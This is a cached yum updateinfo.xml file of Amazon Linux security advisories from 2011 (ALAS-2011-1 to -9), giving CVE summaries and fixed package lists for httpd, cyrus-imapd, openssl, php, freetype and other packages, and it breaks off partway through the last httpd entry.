File: /var/cache/yum/x86_64/latest/amzn-updates/gen/updateinfo.xml
<?xml version="1.0" ?>
<updates><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-1</id><title>Amazon Linux AMI 2011.09 - ALAS-2011-1: medium priority package update for httpd</title><issued date="2011-09-27 22:46:00" /><updated date="2014-09-14 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2011-3192:
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
A flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192" title="" id="CVE-2011-3192" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1245.html" title="" id="RHSA-2011:1245" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-devel" version="2.2.21" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.21-1.18.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.21" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.21-1.18.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.21" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.21-1.18.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.21" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.21-1.18.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.21" release="1.18.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.21-1.18.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.21" release="1.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.21-1.18.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.21" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.21-1.18.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.21" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.21-1.18.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.21" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.21-1.18.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.21" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.21-1.18.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.21" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.21-1.18.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-2</id><title>Amazon Linux - ALAS-2011-2: important priority package update for cyrus-imapd</title><issued date="2011-10-10 22:29:00" /><updated date="2014-09-14 14:25:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3208:
Stack-based buffer overflow in the split_wildmats function in nntpd.c in nntpd in Cyrus IMAP Server before 2.3.17 and 2.4.x before 2.4.11 allows remote attackers to execute arbitrary code via a crafted NNTP command.
A buffer overflow flaw was found in the cyrus-imapd NNTP server, nntpd. A remote user able to use the nntpd service could use this flaw to crash the nntpd child process or, possibly, execute arbitrary code with the privileges of the cyrus user.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3208" title="" id="CVE-2011-3208" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1317.html" title="" id="RHSA-2011:1317" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="cyrus-imapd-debuginfo" version="2.3.16" release="6.4.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-debuginfo-2.3.16-6.4.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-utils" version="2.3.16" release="6.4.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-utils-2.3.16-6.4.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-devel" version="2.3.16" release="6.4.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-devel-2.3.16-6.4.amzn1.i686.rpm</filename></package><package name="cyrus-imapd" version="2.3.16" release="6.4.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-2.3.16-6.4.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-debuginfo" version="2.3.16" release="6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-debuginfo-2.3.16-6.4.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-devel" version="2.3.16" release="6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-devel-2.3.16-6.4.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd" version="2.3.16" release="6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-2.3.16-6.4.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-utils" version="2.3.16" release="6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-utils-2.3.16-6.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-3</id><title>Amazon Linux - ALAS-2011-3: medium priority package update for ca-certificates</title><issued date="2011-10-10 22:31:00" /><updated date="2014-09-14 14:25:00" /><severity>medium</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2011:1248.html" title="" id="RHSA-2011:1248" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ca-certificates" version="2010.63" release="3.7.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2010.63-3.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-4</id><title>Amazon Linux - ALAS-2011-4: medium priority package update for openssl</title><issued date="2011-10-10 23:40:00" /><updated date="2014-09-14 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3207:
crypto/x509/x509_vfy.c in OpenSSL 1.0.x before 1.0.0e does not initialize certain structure members, which makes it easier for remote attackers to bypass CRL validation by using a nextUpdate value corresponding to a time in the past.
An uninitialized variable use flaw was found in OpenSSL. This flaw could cause an application using the OpenSSL Certificate Revocation List (CRL) checking functionality to incorrectly accept a CRL that has a nextUpdate date in the past.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3207" title="" id="CVE-2011-3207" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl-static" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0e-2.16.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0e-2.16.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0e-2.16.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0e-2.16.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0e-2.16.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0e-2.16.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0e-2.16.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0e-2.16.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0e-2.16.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.0e" release="2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0e-2.16.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-5</id><title>Amazon Linux - ALAS-2011-5: medium priority package update for perl-FCGI</title><issued date="2011-10-10 23:48:00" /><updated date="2014-09-14 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-2766:
The FCGI (aka Fast CGI) module 0.70 through 0.73 for Perl, as used by CGI::Fast, uses environment variable values from one request during processing of a later request, which allows remote attackers to bypass authentication via crafted HTTP headers.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2766" title="" id="CVE-2011-2766" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="perl-FCGI-debuginfo" version="0.74" release="1.0.amzn1" epoch="1" arch="i686"><filename>Packages/perl-FCGI-debuginfo-0.74-1.0.amzn1.i686.rpm</filename></package><package name="perl-FCGI" version="0.74" release="1.0.amzn1" epoch="1" arch="i686"><filename>Packages/perl-FCGI-0.74-1.0.amzn1.i686.rpm</filename></package><package name="perl-FCGI-debuginfo" version="0.74" release="1.0.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-FCGI-debuginfo-0.74-1.0.amzn1.x86_64.rpm</filename></package><package name="perl-FCGI" version="0.74" release="1.0.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-FCGI-0.74-1.0.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-6</id><title>Amazon Linux - ALAS-2011-6: medium priority package update for openswan</title><issued date="2011-10-10 23:54:00" /><updated date="2014-09-14 14:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3380:
Openswan 2.6.29 through 2.6.35 allows remote attackers to cause a denial of service (NULL pointer dereference and pluto IKE daemon crash) via an ISAKMP message with an invalid KEY_LENGTH attribute, which is not properly handled by the error handling function.
A NULL pointer dereference flaw was found in the way Openswan's pluto IKE daemon handled certain error conditions. A remote, unauthenticated attacker could send a specially-crafted IKE packet that would crash the pluto daemon.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3380" title="" id="CVE-2011-3380" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1356.html" title="" id="RHSA-2011:1356" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openswan-debuginfo" version="2.6.36" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-debuginfo-2.6.36-1.12.amzn1.i686.rpm</filename></package><package name="openswan" version="2.6.36" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-2.6.36-1.12.amzn1.i686.rpm</filename></package><package name="openswan-doc" version="2.6.36" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-doc-2.6.36-1.12.amzn1.i686.rpm</filename></package><package name="openswan" version="2.6.36" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-2.6.36-1.12.amzn1.x86_64.rpm</filename></package><package name="openswan-debuginfo" version="2.6.36" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-debuginfo-2.6.36-1.12.amzn1.x86_64.rpm</filename></package><package name="openswan-doc" version="2.6.36" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-doc-2.6.36-1.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-7</id><title>Amazon Linux - ALAS-2011-7: important priority package update for php</title><issued date="2011-10-11 00:07:00" /><updated date="2014-09-14 14:25:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3379:
php: changes to is_a() in 5.3.7 may allow arbitrary code execution with certain code
The is_a function in PHP 5.3.7 and 5.3.8 triggers a call to the __autoload function, which makes it easier for remote attackers to execute arbitrary code by providing a crafted URL and leveraging potentially unsafe behavior in certain PEAR packages and custom autoloaders.
CVE-2011-3182:
PHP before 5.3.7 does not properly check the return values of the malloc, calloc, and realloc library functions, which allows context-dependent attackers to cause a denial of service (NULL pointer dereference and application crash) or trigger a buffer overflow by leveraging the ability to provide an arbitrary value for a function argument, related to (1) ext/curl/interface.c, (2) ext/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4) ext/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6) ext/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8) ext/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10) TSRM/tsrm_win32.c, and (11) the strtotime function.
CVE-2011-2483:
crypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain platforms, PostgreSQL before 8.4.9, and other products, does not properly handle 8-bit characters, which makes it easier for context-dependent attackers to determine a cleartext password by leveraging knowledge of a password hash.
A signedness issue was found in the way the crypt() function in the PostgreSQL pgcrypto module handled 8-bit characters in passwords when using Blowfish hashing. Up to three characters immediately preceding a non-ASCII character (one with the high bit set) had no effect on the hash result, thus shortening the effective password length. This made brute-force guessing more efficient as several different passwords were hashed to the same value.
A signedness issue was found in the way the PHP crypt() function handled 8-bit characters in passwords when using Blowfish hashing. Up to three characters immediately preceding a non-ASCII character (one with the high bit set) had no effect on the hash result, thus shortening the effective password length. This made brute-force guessing more efficient as several different passwords were hashed to the same value.
CVE-2011-2202:
The rfc1867_post_handler function in main/rfc1867.c in PHP before 5.3.7 does not properly restrict filenames in multipart/form-data POST requests, which allows remote attackers to conduct absolute path traversal attacks, and possibly create or overwrite arbitrary files, via a crafted upload request, related to a 'file path injection vulnerability.'
The rfc1867_post_handler function in main/rfc1867.c in PHP before 5.3.7 does not properly restrict filenames in multipart/form-data POST requests, which allows remote attackers to conduct absolute path traversal attacks, and possibly create or overwrite arbitrary files, via a crafted upload request, related to a "file path injection vulnerability."
An off-by-one flaw was found in PHP. If an attacker uploaded a file with a specially-crafted file name it could cause a PHP script to attempt to write a file to the root (/) directory. By default, PHP runs as the "apache" user, preventing it from writing to the root directory.
CVE-2011-1938:
Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary code via a long pathname for a UNIX socket.
A stack-based buffer overflow flaw was found in the way the PHP socket extension handled long AF_UNIX socket addresses. An attacker able to make a PHP script connect to a long AF_UNIX socket address could use this flaw to crash the PHP interpreter.
CVE-2011-1148:
Use-after-free vulnerability in the substr_replace function in PHP 5.3.6 and earlier allows context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact by using the same variable for multiple arguments.
A use-after-free flaw was found in the PHP substr_replace() function. If a PHP script used the same variable as multiple function arguments, a remote attacker could possibly use this to crash the PHP interpreter or, possibly, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1148" title="" id="CVE-2011-1148" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938" title="" id="CVE-2011-1938" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2202" title="" id="CVE-2011-2202" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483" title="" id="CVE-2011-2483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3182" title="" id="CVE-2011-3182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3379" title="" id="CVE-2011-3379" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-cli" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-zts" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-zts-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.8" release="3.19.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.8-3.19.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-zts" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-zts-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.8-3.19.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.8" release="3.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.8-3.19.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-8</id><title>Amazon Linux - ALAS-2011-8: important priority package update for freetype</title><issued date="2011-10-31 18:18:00" /><updated date="2014-09-14 14:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3256:
Multiple input validation flaws were found in the way FreeType processed bitmap font files. If a specially-crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
FreeType 2 before 2.4.7, as used in CoreGraphics in Apple iOS before 5, Mandriva Enterprise Server 5, and possibly other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted font, a different vulnerability than CVE-2011-0226.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3256" title="" id="CVE-2011-3256" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1402.html" title="" id="RHSA-2011:1402" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="freetype-devel" version="2.3.11" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-6.10.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-6.10.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-6.10.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-6.10.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-6.10.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-6.10.amzn1.x86_64.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-6.10.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-6.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-9</id><title>Amazon Linux - ALAS-2011-9: medium priority package update for httpd</title><issued date="2011-10-31 18:19:00" /><updated date="2014-09-14 14:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3368:
The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
It was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker.
CVE-2011-3348:
The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
It was discovered that mod_proxy_ajp incorrectly returned an "Internal Server Error" response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed.
